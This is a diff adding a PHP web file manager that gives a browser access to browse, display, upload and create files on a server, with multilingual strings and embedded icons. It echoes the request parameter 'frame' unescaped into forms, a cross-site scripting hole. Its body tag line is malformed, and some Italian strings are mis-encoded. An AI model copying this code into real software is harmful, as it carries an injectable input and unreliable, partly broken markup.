+		$words['treeon'] = 'Baumansicht aktivieren'; $words['treeoff'] = 'Baumansicht deaktivieren';
+		$words['symlink'] = 'Symbolischer Link'; $words['createsymlink'] = 'Link erstellen'; $words['target'] = 'Ziel';
+		$words['reltarget'] = 'Relative Pfadangabe des Ziels';
+		$words['alreadyexists'] = 'Die Datei existiert bereits.';
+		$words['overwrite'] = 'Soll 1 &uuml;berschrieben werden?';
+		$words['samefiles'] = '1 und 2 sind identisch.';
+		break;
+	case 'cz':
+		$words['dir'] = 'Adres&#xE1;&#x0159;'; $words['file'] = 'Soubor';
+		$words['filename'] = 'Jm&#xE9;no souboru'; $words['size'] = 'Velikost'; $words['permission'] = 'Pr&#xE1;va'; $words['functions'] = 'Functions';
+		$words['owner'] = 'Vlastn&#xED;k'; $words['group'] = 'Skupina'; $words['other'] = 'Ostatn&#xED;';
+		$words['create'] = 'vytvo&#x0159;it'; $words['copy'] = 'kop&#xED;rovat'; $words['copyto'] = 'kop&#xED;rovat do'; $words['move'] = 'p&#x0159;esunout'; $words['moveto'] = 'p&#x0159;esunout do'; $words['delete'] = 'odstranit'; $words['edit'] = '&#xFA;pravy';
+		$words['read'] = '&#x010D;ten&#xED;'; $words['write'] = 'z&#xE1;pis'; $words['exec'] = 'spu&#x0161;t&#x011B;n&#xED;'; $words['change'] = 'zm&#x011B;nit'; $words['upload'] = 'nahr&#xE1;t'; $words['configure'] = 'nastaven&#xED;';
+		$words['yes'] = 'ano'; $words['no'] = 'ne';
+		$words['back'] = 'zp&#xE1;tky'; $words['setperms'] = 'nastav pr&#xE1;va';
+		$words['readingerror'] = 'Chyba p&#x0159;i &#x010D;ten&#xED; 1';
+		$words['permsset'] = 'P&#x0159;&#xED;stupov&#xE1; pr&#xE1;va k 1 byla nastavena na 2.'; $words['permsnotset'] = 'P&#x0159;&#xED;stupov&#xE1; pr&#xE1;va k 1 nelze  nastavit na 2.';
+		$words['uploaded'] = 'Soubor 1 byl ulo&#x017E;en do adres&#xE1;&#x0159;e 2.'; $words['notuploaded'] = 'Chyba p&#x0159;i ukl&#xE1;d&#xE1;n&#xED; souboru 1 do adres&#xE1;&#x0159;e 2.';
+		$words['moved'] = 'Soubor 1 byl p&#x0159;esunut do adres&#xE1;&#x0159;e 2.'; $words['notmoved'] = 'Soubor 1 nelze p&#x0159;esunout do adres&#xE1;&#x0159;e 2.';
+		$words['copied'] = 'Soubor 1 byl zkop&#xED;rov&#xE1;n do adres&#xE1;&#x0159;e 2.'; $words['notcopied'] = 'Soubor 1 nelze zkop&#xED;rovat do adres&#xE1;&#x0159;e 2.';
+		$words['created'] = '1 byl vytvo&#x0159;en.'; $words['notcreated'] = '1 nelze vytvo&#x0159;it.';
+		$words['deleted'] = '1 byl vymaz&#xE1;n.'; $words['notdeleted'] = '1 nelze vymazat.'; $words['suredelete'] = 'Skute&#x010D;n&#x011B; smazat 1?';
+		$words['saved'] = 'Soubor 1 byl ulo&#x017E;en.'; $words['notsaved'] = 'Soubor 1 nelze ulo&#x017E;it.';
+		$words['reset'] = 'zp&#x011B;t'; $words['clear'] = 'vy&#x010D;istit'; $words['save'] = 'ulo&#x017E;';
+		$words['cantbeshown'] = "1 can't be shown."; $words['sourceof'] = 'source of 1';
+		$words['notopened'] = "1 nelze otev&#x0159;&#xED;t";
+		$words['addauth'] = 'p&#x0159;idat z&#xE1;kladn&#xED;-authentifikaci';
+		$words['username'] = 'U&#x017E;ivatelsk&#xE9; jm&#xE9;no'; $words['password'] = 'Heslo'; $words['add'] = 'p&#x0159;idat';
+		$words['treeon'] = 'Zobraz strom adres&#xE1;&#x0159;&#x016F;'; $words['treeoff'] = 'Skryj strom adres&#xE1;&#x0159;&#x016F;';
+		$words['symlink'] = 'Symbolick&#xFD; odkaz'; $words['createsymlink'] = 'vytvo&#x0159;it odkaz'; $words['target'] = 'C&#xED;l';
+		$words['reltarget'] = 'Relativni cesta k c&#xED;li';
+		$words['alreadyexists'] = 'Tento soubor u&#x017E; existuje.';
+		$words['overwrite'] = 'P&#x0159;epsat 1?';
+		$words['samefiles'] = '1 a 2 jsou identick&#xE9;l.';
+		break;
+	case 'it':
+		$words['dir'] = 'Directory'; $words['file'] = 'File';
+		$words['filename'] = 'Nome file'; $words['size'] = 'Dimensioni'; $words['permission'] = 'Permessi'; $words['functions'] = 'Funzioni';
+		$words['owner'] = 'Proprietario'; $words['group'] = 'Gruppo'; $words['other'] = 'Altro';
+		$words['create'] = 'crea'; $words['copy'] = 'copia'; $words['copyto'] = 'copia su'; $words['move'] = 'muovi'; $words['moveto'] = 'muove su'; $words['delete'] = 'delete'; $words['edit'] = 'edit';
+		$words['read'] = 'leggi'; $words['write'] = 'scrivi'; $words['exec'] = 'esegui'; $words['change'] = 'modifica'; $words['upload'] = 'upload'; $words['configure'] = 'configura';
+		$words['yes'] = 'si'; $words['no'] = 'no';
+		$words['back'] = 'back'; $words['setperms'] = 'imposta permessi';
+		$words['readingerror'] = 'Errore durante la lettura di 1';
+		$words['permsset'] = 'I permessi di 1 sono stati impostati a 2.'; $words['permsnotset'] = 'I permessi di 1 non possono essere impostati.';
+		$words['uploaded'] = '1 � stato uploadato su 2.'; $words['notuploaded'] = 'Errore durante l\'upload di 1 su 2.';
+		$words['moved'] = '1 � stato spostato su 2.'; $words['notmoved'] = '1 non pu� essere spostato su 2.';
+		$words['copied'] = '1 � stato copiato su 2.'; $words['notcopied'] = '1 non pu� essere copiato su 2.';
+		$words['created'] = '1 � stato creato.'; $words['notcreated'] = 'impossibile creare 1.';
+		$words['deleted'] = '1 � stato eliminato.'; $words['notdeleted'] = 'Impossibile eliminare 1.'; $words['suredelete'] = 'Confermi eliminazione di 1?';
+		$words['saved'] = '1 � stato salvato.'; $words['notsaved'] = 'Impossibile salvare 1.';
+		$words['reset'] = 'reimposta'; $words['clear'] = 'pulisci'; $words['save'] = 'salva';
+		$words['cantbeshown'] = "Impossibile visualizzare 1."; $words['sourceof'] = 'sorgente di 1';
+		$words['notopened'] = "Impossibile aprire 1";
+		$words['addauth'] = 'aggiunge autenticazione di base';
+		$words['username'] = 'Nome Utente'; $words['password'] = 'Password'; $words['add'] = 'add';
+		$words['treeon'] = 'Abilita vista ad albero'; $words['treeoff'] = 'Disabilita vista ad albero';
+		$words['symlink'] = 'Link simbolico'; $words['createsymlink'] = 'crea symlink'; $words['target'] = 'Target';
+		$words['reltarget'] = 'Percorso relativo al target';
+		$words['alreadyexists'] = 'Questo file esiste gi�.';
+		$words['overwrite'] = 'Sovrascrivi 1?';
+		$words['samefiles'] = '1 e 2 sono identici.';
+		break;
+	case 'en':
+	default:
+		$words['dir'] = 'Directory'; $words['file'] = 'File';
+		$words['filename'] = 'Filename'; $words['size'] = 'Size'; $words['permission'] = 'Permission'; $words['functions'] = 'Functions';
+		$words['owner'] = 'Owner'; $words['group'] = 'Group'; $words['other'] = 'Other';
+		$words['create'] = 'create'; $words['copy'] = 'copy'; $words['copyto'] = 'copy to'; $words['move'] = 'move'; $words['moveto'] = 'move to'; $words['delete'] = 'delete'; $words['edit'] = 'edit';
+		$words['read'] = 'read'; $words['write'] = 'write'; $words['exec'] = 'execute'; $words['change'] = 'change'; $words['upload'] = 'upload'; $words['configure'] = 'configure';
+		$words['yes'] = 'yes'; $words['no'] = 'no';
+		$words['back'] = 'back'; $words['setperms'] = 'set permission';
+		$words['readingerror'] = 'Error during read of 1';
+		$words['permsset'] = 'The permission of 1 were set to 2.'; $words['permsnotset'] = 'The permission of 1 could not be set.';
+		$words['uploaded'] = '1 has been uploaded to 2.'; $words['notuploaded'] = 'Error during upload of 1 to 2.';
+		$words['moved'] = '1 has been moved to 2.'; $words['notmoved'] = '1 could not be moved to 2.';
+		$words['copied'] = '1 has been copied to 2.'; $words['notcopied'] = '1 could not be copied to 2.';
+		$words['created'] = '1 has been created.'; $words['notcreated'] = '1 could not be created.';
+		$words['deleted'] = '1 has been deleted.'; $words['notdeleted'] = '1 could not be deleted.'; $words['suredelete'] = 'Really delete 1?';
+		$words['saved'] = '1 has been saved.'; $words['notsaved'] = '1 could not be saved.';
+		$words['reset'] = 'reset'; $words['clear'] = 'clear'; $words['save'] = 'save';
+		$words['cantbeshown'] = "1 can't be shown."; $words['sourceof'] = 'source of 1';
+		$words['notopened'] = "1 couldn't be opened";
+		$words['addauth'] = 'add basic-authentification';
+		$words['username'] = 'Username'; $words['password'] = 'Password'; $words['add'] = 'add';
+		$words['treeon'] = 'Enable treeview'; $words['treeoff'] = 'Disable treeview';
+		$words['symlink'] = 'Symbolic link'; $words['createsymlink'] = 'create link'; $words['target'] = 'Target';
+		$words['reltarget'] = 'Relative path to target';
+		$words['alreadyexists'] = 'This file already exists.';
+		$words['overwrite'] = 'Overwrite 1?';
+		$words['samefiles'] = '1 and 2 are identical.';
+	}
+	return $words;
+}
+
+function getimage ($iid) {
+	$image = 'GIF89a';
+	switch ($iid) {
+	case  1: $image .= "\23\0\22\0\242\4\0\0\0\0\377\377\377\314\314\314\231\231\231\377\377\377\0\0\0\0\0\0\0\0\0!\371\4\1\350\3\4\0,\0\0\0\0\23\0\22\0\0\3?H\272\334N \312\327@\270\30P%\273\237\213\205\215\244\240q\201\240\256\254:\234P\332\316o(\317l\215\342\255\36\363\71\230\5\270\362\15\211\2cr\300l:\231\60\310g\272\251Z\257\330l5\1\0;\0"; break;
+	case  2: $image .= "\23\0\22\0\221\2\0\0\0\0\314\314\314\377\377\377\0\0\0!\371\4\1\350\3\2\0,\0\0\0\0\23\0\22\0\0\2\64\224\217\251\2\355\233@\230\24@#\251v\357d\15V^H\6\26fr\352\312\230ehI\337;\305\63}6\364\206\356\365\350\63!V\304\323\345\210L*\227\220\2\0;\0"; break;
+	case  3: $image .= "\23\0\22\0\200\1\0\231\231\231\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\32\214o\200\313\355\255\236\234,\322+-\336K\363\357}[(^d9\235hP\0\0;\0"; break;
+	case  4: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2.\234\217\251\313\355\17\15\230\224:\20\262\16\340j\241u\15\226\201\231\310\140\302\272rC\207\36d\140\272\343\27z\333yUU\4\14\12\207DF\1\0;\0"; break;
+	case  5: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2*\234\217\251\313\355\17\15\230\224:\20\262\16\340n\335\65\330\307y\302y\226]\210\214\37\273\270\33\254\310\340UU\321\316\367\376\317(\0\0;\0"; break;
+	case  6: $image .= "\23\0\22\0\200\1\0\231\231\231\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\33\214o\200\313\355\255\236\234,\322+-\336K\371\360q\224\46rd\211\235\350\270\76\5\0;\0"; break;
+	case  7: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2\60\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\234\320\201PGr\46\263\11\256\373\15\312*\243\245f\253\270\247?\330O\11\206\204\304a\221R\0\0;\0"; break;
+	case  8: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2/\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\36\7B#\251\5\302\272~\203R\46\247\373\210c\274\330\36\216\140\76\5\14\5\207B\42\245\0\0;\0"; break;
+	case  9: $image .= "\23\0\22\0\200\1\0\231\231\231\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\30\214o\200\313\355\255\236\234,\322+-\336K\371\360q\342H\226\346\211r\5\0;\0"; break;
+	case 10: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2/\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\234\320\201PGr\46\263\11\256\373\15\312*\243\245f\253\270\247?\330O\11\12\207\304\242\260\0\0;\0"; break;
+	case 11: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2.\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\36\7B#\251\5\302\272~\203R\46\247\373\210c\274\330\36\216\140\76\5\14\12\207\304\140\1\0;\0"; break;
+	case 12: $image .= "\21\0\15\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\21\0\15\0\0\2-\234\201\211\306\15\1\343j\354\211+\302\3\364D\231t\26\206i\342\207r\324Hf\252\203~o\25\264\227\271\306\322i\273\247\216s(\206\257\2\0;\0"; break;
+	case 13: $image .= "\21\0\15\0\221\3\0\314\0\0\377\377\377\231\231\231\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\21\0\15\0\0\2-\234\201\211\306\15\1\343j\354\211+\302\3\364D\231t\26\206i\342\207r\324Hf\252\203~o\25\264\227\271\306\322i\273\247\216s(\206\257\2\0;\0"; break;
+	case 14: $image .= "\21\0\15\0\242\4\0\231\231\231\377\377\377\0\0\0\314\0\0\377\377\377\0\0\0\0\0\0\0\0\0!\371\4\1\350\3\4\0,\0\0\0\0\21\0\15\0\0\3\71H\12\334\254\60\202@\353\213p\212-\302\4\330RYM8\15\3\305y\46\205\216,\204\316s\260\305\12M\217 6\5/[\247\47\1\246\140\304\314\210\63l\301,\46\207\224\230\0\0;\0"; break;
+	case 15: $image .= "\21\0\15\0\221\3\0\231\231\231\377\377\377\314\314\314\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\21\0\15\0\0\2*\234\217\231\300\254\33b\4\317\264\213\235\225\274\13:\0\201@\226\46\11\212\347\372m\354\231\216o\31\317\264k\267a\216\36\331o(\0\0;\0"; break;
+	case 16: $image .= "\21\0\15\0\221\2\0\0\0\0\377\377\0\377\377\377\0\0\0!\371\4\1\350\3\2\0,\0\0\0\0\21\0\15\0\0\2,\224\217\251\2\355\260\14\10\263\322\65\203\336\32\246\7\66_\325P\245x\224\34\207J\344vzi\7wJf\342\62\202\263\21\23\372\11\17\5\0;\0"; break;
+	case  0:
+	default: $image .= "\23\0\22\0\200\1\0\0\0\0\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\20\214\217\251\313\355\17\243\234\264\332\213\263\336\274\327\2\0;\0"; break;
+	}
+	return $image;
+}
+
+function tree_hassubdirs ($path) {
+	if ($p = @opendir($path)) {
+		while (($filename = readdir($p)) !== FALSE) {
+			if (tree_isrealdir($path . $filename)) return TRUE;
+		}
+	}
+	return FALSE;
+}
+
+function tree_isrealdir ($path) {
+	if (basename($path) != '.' && basename($path) != '..' && @is_dir($path) && !@is_link($path)) return TRUE; else return FALSE;
+}
+
+function treeview () {
+	global $self, $treeroot;
+	if (isset($_GET['plus']))	tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $_GET['plus']);
+	if (isset($_GET['minus']))	$dirchanged = tree_minus($_SESSION['tree'], $_SESSION['hassubdirs'], $_GET['minus']); else $dirchanged = FALSE;
+	for ($d = $_SESSION['dir']; strlen($d = dirname($d)) != 1; tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $d));
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
+<html>
+<head>
+	<title>Treeview</title>
+	<style type="text/css">
+	<!--
+		td { font-family: sans-serif; font-size: 10pt; }
+		a:link, a:visited, a:active { text-decoration: none; color: #000088; }
+		a:hover { text-decoration: underline; color: #000088; }
+	-->
+	</style>
+</head>
+<body bgcolor="#FFFFFF"<?php if ($dirchanged) echo(" '$self?noupdate=TRUE&dir=" . urlencode($_SESSION['dir']) . '&' . SID . '&pmru=' . time() . "'))\""); ?>>
+	<table border="0" cellspacing="0" cellpadding="0">
+<?php
+	tree_showtree($_SESSION['tree'], $_SESSION['hassubdirs'], $treeroot, 0, tree_calculatenumcols($_SESSION['tree'], $treeroot, 0));
+?>
+	</table>
+</body>
+</html>
+<?php
+	return;
+}
+
+function frameset () {
+	global $self;
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Frameset//EN">
+<html>
+<head>
+	<title><?php echo($self); ?></title>
+</head>
+<frameset cols="250,*">
+	<frame src="<?php echo("$self?frame=treeview&" . SID . '#' . urlencode($_SESSION['dir'])); ?>" name="treeview">
+	<frame src="<?php echo("$self?" . SID); ?>" name="webadmin">
+</frameset>
+</html>
+<?php
+	return;
+}
+
+function tree_calculatenumcols ($tree, $path, $col) {
+	static $numcols = 0;
+	if ($col > $numcols) $numcols = $col; 
+	if (isset($tree[$path])) {
+		for ($i = 0; $i < sizeof($tree[$path]); $i++) {
+			$numcols = tree_calculatenumcols($tree, $path . $tree[$path][$i], $col + 1);
+		}
+	} 
+	return $numcols;
+}
+
+function tree_showtree ($tree, $hassubdirs, $path, $col, $numcols) {
+	global $self, $treeroot;
+	static $islast = array(0 => TRUE);
+	echo("	<tr>\n");
+	for ($i = 0; $i < $col; $i++) {
+		if ($islast[$i]) $iid = 0; else $iid = 3;
+		echo("		<td><img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\"></td>\n");
+	}
+	if ($hassubdirs[$path]) {
+		if (!empty($tree[$path])) { $action = 'minus'; $iid = 8; } else { $action = 'plus'; $iid = 7; }
+		if ($col == 0) $iid -= 3; else if ($islast[$col]) $iid += 3;
+		echo("		<td><a href=\"$self?frame=treeview&$action=" . urlencode($path) . '&dir=' . urlencode($_SESSION['dir']) . '&' . SID . '#' . urlencode($path) . '">');
+		echo("<img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\" border=\"0\">");
+		echo("</a></td>\n");
+	} else {
+		if ($islast[$col]) $iid = 9; else $iid = 6;
+		echo("		<td><img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\"></td>\n");
+	}
+	if (@is_readable($path)) {
+		$a1 = "<a name=\"" . urlencode($path) . "\" href=\"$self?dir=" . urlencode($path) . '&' . SID . '" target="webadmin">';
+		$a2 = '</a>';
+	} else {
+		$a1 = $a2 = '';
+	}
+	if ($_SESSION['dir'] == $path) $iid = 2; else $iid = 1;
+	echo("		<td>$a1<img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\" border=\"0\">$a2</td>\n");
+	$cspan = $numcols - $col + 1;
+	if ($cspan > 1) $colspan = " colspan=\"$cspan\""; else $colspan = '';
+	if ($col == $numcols) $width = ' width="100%"'; else $width = '';
+	echo("		<td$width$colspan nowrap>&nbsp;");
+	if ($path == $treeroot) $label = $path; else $label = basename($path);
+	echo($a1 . htmlentities($label) . $a2);
+	echo("</td>\n");
+	echo("	</tr>\n");
+	if (!empty($tree[$path])) {
+		for ($i = 0; $i < sizeof($tree[$path]); $i++) {
+			if (($i + 1) == sizeof($tree[$path])) $islast[$col + 1] = TRUE; else $islast[$col + 1] = FALSE;
+			tree_showtree($tree, $hassubdirs, $path . $tree[$path][$i], $col + 1, $numcols);
+		}
+	}
+	return;
+}
+
+function tree_plus (&$tree, &$hassubdirs, $p) {
+	if ($path = spath(realpath($p))) {
+		$tree[$path] = tree_getsubdirs($path);
+		for ($i = 0; $i < sizeof($tree[$path]); $i++) {
+			$subdir = $path . $tree[$path][$i];
+			if (empty($hassubdirs[$subdir])) $hassubdirs[$subdir] = tree_hassubdirs($subdir);
+		}
+	}
+	return;
+}
+
+function tree_minus (&$tree, &$hassubdirs, $p) {
+	$dirchanged = FALSE;
+	if ($path = spath(realpath($p))) {
+		if (!empty($tree[$path])) {
+			for ($i = 0; $i < sizeof($tree[$path]); $i++) {
+				$subdir = $path . $tree[$path][$i] . '/';
+				if (isset($hassubdirs[$subdir])) $hassubdirs[$subdir] = NULL;
+			}
+			$tree[$path] = NULL;
+			if (substr($_SESSION['dir'], 0, strlen($path)) == $path) {
+				$_SESSION['dir'] = $path;
+				$dirchanged = TRUE;
+			}
+		}
+	}
+	return $dirchanged;
+}
+
+function tree_getsubdirs ($path) {
+	$subdirs = array();
+	if ($p = @opendir($path)) {
+		for ($i = 0; ($filename = readdir($p)) !== FALSE;) {
+			if (tree_isrealdir($path . $filename)) $subdirs[$i++] = $filename . '/';
+		}
+	}
+	sort($subdirs);
+	return $subdirs;
+}
+
+function show ($file) {
+	global $words;
+	if (@is_readable($file) && @is_file($file)) {
+		header('Content-Disposition: filename=' . basename($file));
+		header('Content-Type: ' . getmimetype($file));
+		if (@readfile($file) !== FALSE) return TRUE;
+	}
+	return FALSE;
+}
+
+function show_highlight ($file) {
+	global $words;
+	if (@is_readable($file) && @is_file($file)) {
+		header('Content-Disposition: filename=' . basename($file));
+		echo("<html>\n<head><title>");
+		echo(buildphrase(array('&quot;' . htmlentities(basename($file)) . '&quot;'), $words['sourceof']));
+		echo("</title></head>\n<body>\n<table cellpadding=\"4\" border=\"0\">\n<tr>\n<td>\n<code style=\"color: #999999\">\n");
+		$size = sizeof(file($file));
+		for ($i = 1; $i <= $size; $i++) printf("%05d<br>\n", $i);
+		echo("</code>\n</td>\n<td nowrap>\n");
+		$shown = @highlight_file($file);
+		echo("\n");
+		echo("</td>\n</tr>\n</table>\n");
+		echo("</body>\n");
+		echo("</html>");
+		if ($shown) return TRUE;
+	}
+	return FALSE;
+}
+
+function getmimetype ($file) {
+	/* $mime = 'application/octet-stream'; */
+	$mime = 'text/plain';
+	$ext = substr($file, strrpos($file, '.') + 1);
+	if (@is_readable('/etc/mime.types')) {
+		$f = fopen('/etc/mime.types', 'r');
+		while (!feof($f)) {
+			$line = fgets($f, 4096);
+			$found = FALSE;
+			$mim = strtok($line," \n\t");
+			$ex = strtok(" \n\t");
+			while ($ex && !$found) {
+				if (strtolower($ex) == strtolower($ext)) {
+					$found = TRUE;
+					$mime = $mim;
+					break;
+				}
+				$ex = strtok(" \n\t");
+			}
+			if ($found) break;
+		}
+		fclose($f);
+	}
+	return $mime;
+}
+
+function dirlisting ($inaframe = FALSE) {
+	global $self, $homedir, $words;
+	global $error, $notice;
+	$p = '&' . SID;
+	html_header($_SESSION['dir']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td bgcolor="#EEEEEE" colspan="2">
+			<table border="0" cellspacing="0" cellpadding="0">
+			<tr>
+				<td><?php echo("<a href=\"$self?dir=" . urlencode($homedir) . "$p\">" . $words['dir']); ?></a>:&nbsp;</td>
+				<td><input type="text" name="dir" value="<?php echo(htmlentities($_SESSION['dir'])); ?>" size="<?php echo(textfieldsize($_SESSION['dir'])); ?>">&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['change']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php if (@is_writable($_SESSION['dir'])) { ?>
+	<form action="<?php echo($self); ?>" method="post" enctype="multipart/form-data">
+	<input type="hidden" name="dir" value="<?php echo(htmlentities($_SESSION['dir'])); ?>">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+<?php if (isset($_REQUEST['frame'])) { ?>
+	<input type="hidden" name="frame" value="<?php echo($_REQUEST['frame']); ?>">
+<?php } ?>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE">
+			<table border="0" cellspacing="0" cellpadding="0">
+			<tr>
+				<td><?php echo($words['file']); ?>&nbsp;</td>
+				<td><input type="file" name="upload">&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['upload']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	<tr>
+		<td bgcolor="#EEEEEE">
+			</form>
+			<form action="<?php echo($self); ?>" method="get">
+			<input type="hidden" name="dir" value="<?php echo(htmlentities($_SESSION['dir'])); ?>">
+			<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+<?php if (isset($_REQUEST['frame'])) { ?>
+			<input type="hidden" name="frame" value="<?php echo($_REQUEST['frame']); ?>">
+<?php } ?>
+			<table border="0" cellspacing="0" cellpadding="0">
+			<tr>
+				<td>
+					<select name="type" size="1">
+					<option value="file"><?php echo($words['file']); ?>
+
+					<option value="dir" selected><?php echo($words['dir']); ?>
+
+					</select>&nbsp;
+				</td>
+				<td><input type="text" name="create">&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['create']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+	}
+	if (empty($_GET['sort'])) $sort = 'filename'; else $sort = $_GET['sort'];
+	$reverse = @$_GET['reverse'];
+	$GLOBALS['showsize'] = FALSE;
+	if ($files = dirtoarray($_SESSION['dir'])) {
+		$files = sortfiles($files, $sort, $reverse);
+		outputdirlisting($_SESSION['dir'], $files, $inaframe, $sort, $reverse);
+	} else {
+		perror(buildphrase('&quot;<b>' . htmlentities($_SESSION['dir']) . '</b>&quot', $words['readingerror']));
+	}
+	if ($inaframe) {
+		pnotice("<a href=\"$self?action=treeoff&" . SID . '" target="_top">' . $words['treeoff'] . '</a>');
+	} else {
+		pnotice("<a href=\"$self?action=treeon&" . SID . '" target="_top">' . $words['treeon'] . '</a>');
+	}
+	html_footer(FALSE);
+	return;
+}
+
+function dirtoarray ($dir) {
+	if ($dirstream = @opendir($dir)) {
+		for ($n = 0; ($filename = readdir($dirstream)) !== FALSE; $n++) {
+			$stat = @lstat($dir . $filename);
+			$files[$n]['filename']     = $filename;
+			$files[$n]['fullfilename'] = $fullfilename = relpathtoabspath($filename, $dir);
+			$files[$n]['is_file']      = @is_file($fullfilename);
+			$files[$n]['is_dir']       = @is_dir($fullfilename);
+			$files[$n]['is_link']      = $islink = @is_link($dir . $filename);
+			if ($islink) {
+				$files[$n]['readlink'] = @readlink($dir . $filename);
+				$files[$n]['linkinfo'] = linkinfo($dir . $filename);
+			}
+			$files[$n]['is_readable']   = @is_readable($fullfilename);
+			$files[$n]['is_writable']   = @is_writable($fullfilename);
+			$files[$n]['is_executable'] = @is_executable($fullfilename);
+			$files[$n]['permission']    = $islink ? 'lrwxrwxrwx' : octtostr(@fileperms($dir . $filename));
+			if (substr($files[$n]['permission'], 0, 1) != '-') {
+				$files[$n]['size'] = -1;
+			} else {
+				$files[$n]['size'] = @$stat['size'];
+				$GLOBALS['showsize'] = TRUE;
+			}
+			$files[$n]['owner']         = $owner = @$stat['uid'];
+			$files[$n]['group']         = $group = @$stat['gid'];
+			$files[$n]['ownername']     = @reset(posix_getpwuid($owner));
+			$files[$n]['groupname']     = @reset(posix_getgrgid($group));
+		}
+		closedir($dirstream);
+		return $files;
+	} else {
+		return FALSE;
+	}
+}
+
+function outputdirlisting ($dir, $files, $inaframe, $sort, $reverse) {
+	global $self, $words;
+	$uid = posix_getuid();
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+<?php
+	if ($inaframe) $p = '&notreeupdate=TRUE&'; $p = ''; $p .= SID . '&dir=' . urlencode($dir);
+	echo("	<tr>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><img src=\"$self?imageid=16\" width=\"17\" height=\"13\"></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=filename&reverse=" . (($sort == 'filename') ? !$reverse : 0) . "&$p\"><b>{$words['filename']}</b></a></td>\n");
+	if ($GLOBALS['showsize']) echo("		<td bgcolor=\"#EEEEEE\" align=\"right\"><a href=\"$self?sort=size&reverse=" . (($sort == 'size') ? !$reverse : 0) . "&$p\"><b>{$words['size']}</b></a></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=permission&reverse=" . (($sort == 'permission') ? !$reverse : 0) . "&$p\"><b>{$words['permission']}</b></a></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=owner&reverse=" . (($sort == 'owner') ? !$reverse : 0) . "&$p\"><b>{$words['owner']}</b></a></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=group&reverse=" . (($sort == 'group') ? !$reverse : 0) . "&$p\"><b>{$words['group']}</b></a></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><b>{$words['functions']}</b></td>\n");
+	echo("	</tr>\n");
+	$p = '&' . SID;
+	if ($GLOBALS['showsize']) $cspan = ' colspan="2"'; else $cspan = '';
+	foreach ($files as $file) {
+		echo("	<tr>\n");
+		if ($file['is_link']) {
+			echo("		<td bgcolor=\"#FFFFFF\" align=\"center\"><img src=\"$self?imageid=14\" width=\"17\" height=\"13\"></td>\n");
+			echo("		<td$cspan bgcolor=\"#FFFFFF\">");
+			if ($file['is_dir']) echo('[ ');
+			echo($file['filename']);
+			if ($file['is_dir']) echo(' ]');
+			echo(' -&gt; ');
+			if ($file['is_dir']) {
+				echo('[ ');
+				if ($file['is_readable']) echo("<a href=\"$self?dir=" . urlencode($file['readlink']) . "$p\">");
+				echo(htmlentities($file['readlink']));
+				if ($file['is_readable']) echo('</a>');
